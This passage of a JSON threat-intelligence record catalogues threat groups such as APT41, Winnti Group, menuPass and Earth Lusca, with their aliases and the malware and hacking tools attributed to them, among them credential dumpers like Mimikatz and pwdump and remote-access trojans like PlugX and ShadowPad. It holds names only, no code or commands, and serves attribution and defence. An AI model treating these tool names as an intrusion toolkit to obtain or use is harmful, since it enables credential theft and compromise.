				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6de442c2-1335-4c96-9f9b-87f61a52074e",
			"created_at": "2025-05-18T02:00:03.043587Z",
			"updated_at": "2026-04-10T02:00:03.840911Z",
			"deleted_at": null,
			"main_name": "FishMedley",
			"aliases": [],
			"source_name": "MISPGALAXY:FishMedley",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41",
				"BARIUM",
				"Blackfly",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku",
				"GREF",
				"Group 72",
				"Red Kelpie",
				"TA415",
				"TG-2633",
				"Wicked Panda",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ba3eea09-ce30-4cfa-ae3a-b5992c4b81f8",
			"created_at": "2022-10-25T15:50:23.441443Z",
			"updated_at": "2026-04-10T02:00:05.263145Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"Aquatic Panda"
			],
			"source_name": "MITRE:Aquatic Panda",
			"tools": [
				"Wevtutil",
				"Winnti for Windows",
				"njRAT",
				"Cobalt Strike",
				"ShadowPad",
				"Winnti for Linux"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"CHROMIUM",
				"Charcoal Typhoon",
				"Earth Lusca",
				"FISHMONGER",
				"Red Dev 10",
				"Red Scylla",
				"RedHotel",
				"Tag-22"
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.pdf",
		"text": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.txt",
		"img": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.jpg"
	}
}